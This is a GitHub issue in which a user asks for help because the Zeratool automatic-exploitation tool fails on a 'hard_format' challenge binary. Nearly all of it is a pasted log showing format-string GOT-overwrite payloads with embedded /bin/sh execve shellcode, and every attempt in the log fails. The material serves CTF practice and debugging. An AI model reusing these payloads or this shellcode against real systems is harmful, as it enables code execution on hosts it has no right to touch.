Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Issue about "hard_format" binary exploitation #16

Open
kxdkxd opened this issue Apr 15, 2021 · 0 comments
Open

Issue about "hard_format" binary exploitation #16

kxdkxd opened this issue Apr 15, 2021 · 0 comments

Comments

@kxdkxd
Copy link

kxdkxd commented Apr 15, 2021

I have tried the brand new pull request on the original repo, works fine with me!

But I still have some troubles when exploting the "hard_format" binary, while the others can be exploited succesfully. Although I have run this script for dozens of times, it didn't work.

The log is pretty long:

(zeratool) aaa@aaa-ubuntu1604:~/Zeratool$ python zeratool.py challenges/hard_format
[+] Checking input type
[+] Checking pwn type...
[+] Checking for overflow pwn type...
[+] Checking for format string pwn type...
[+] Found symbolic buffer at position 0 of length 49
[+] Vulnerable path found %x_%
[+] Triggerable with STDIN : %x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x_%x




[+] Getting binary protections
[+] Checking for flag leak
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[~] Odd length string detected... Skipping
[+] Returned ,*%x_%0$08x_%1$08x_%2$08x_%3$08x_%4$08x_%5$08x8x_%22$08x_%23$08x_%24$08x_%25$08x_%26$08x_%27$08x_%28$08x_%8x_%46$08x_%47$08x



t***>*><**@b*
[~] Locating buffer stack location
aaaa_0000012c_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_2aa615a0_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_00000001_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



aaaa_61616161_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx



[+] Found stack location at 4
[+] Binary does not have NX
[+] Overwriting GOT entry to point to shellcode
Process with PID 12828 started...
= attach 12828 12828
bin.baddr 0x08048000
Using 0x8048000
asm.bits 32
glibc.fc_offset = 0x00148
Continue until 0x08048380 using 1 bpsize
hit breakpoint at: 0x8048380
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13007 started...
= attach 13007 13007
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'4\x97\x04\x086\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13130 started...
= attach 13130 13130
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x97\x04\x08b\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13250 started...
= attach 13250 13250
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'L\x97\x04\x08N\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13370 started...
= attach 13370 13370
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'D\x97\x04\x08F\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13488 started...
= attach 13488 13488
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'H\x97\x04\x08J\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x7ffefe20
[+] Shellcode located at 0x7ffefe40
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%65080c%4$hn%33214c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13610 started...
= attach 13610 13610
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[+] Shellcode located at 0xffffcd60
[+] Adjusted payload:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'P\x97\x04\x08R\x97\x04\x08%52568c%4$hn%12959c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80\x00\x0b\x0b\x0b\n'
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13729 started...
= attach 13729 13729
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13791 started...
= attach 13791 13791
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13853 started...
= attach 13853 13853
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13915 started...
= attach 13915 13915
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 13977 started...
= attach 13977 13977
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x12c
[+] Shellcode located at 0x14a
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%322c%4$hn%65206c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14039 started...
= attach 14039 14039
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Found symbolic buffer at position 0 of length 0
[-] Value at stack offset 3 not a pointer
[+] Found symbolic buffer at position 0 of length 49
[+] Overwiting __gmon_start__ at 0x8049734
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'4\x97\x04\x086\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14103 started...
= attach 14103 14103
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting stdin at 0x8049760
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'`\x97\x04\x08b\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14165 started...
= attach 14165 14165
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting exit at 0x804974c
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'L\x97\x04\x08N\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14227 started...
= attach 14227 14227
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting printf at 0x8049744
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'D\x97\x04\x08F\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14289 started...
= attach 14289 14289
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting fgets at 0x8049748
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'H\x97\x04\x08J\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14352 started...
= attach 14352 14352
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
[+] Overwiting __libc_start_main at 0x8049750
[+] Format buffer at 0x60
[+] Shellcode located at 0x7d
[+] Format write:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn'
[+] Constructed payload:
'P\x97\x04\x08R\x97\x04\x08%117c%4$hn%65411c%5$hn1\xc0Ph//shh/bin\x89\xe3PS\x89\xe1\xb0\x0b\xcd\x80'
[+] Constructed stdout:
'`\x00\x00\x00\x00\x00\x08\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x0b\x00\x00\x00\x00\x0b\x00\x00\n'
[~] Testing payload
[-] Payload launch failed. Fixing angr stack pointer
.trace is deprecated: please use .descriptions
Process with PID 14414 started...
= attach 14414 14414
File dbg:///home/kxd/Zeratool/challenges/hard_format  reopened in read-write mode
Continue until 0x08048330 using 1 bpsize
hit breakpoint at: 0x8048330
[-] Unable to find shellcode location for corrected stack
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@kxdkxd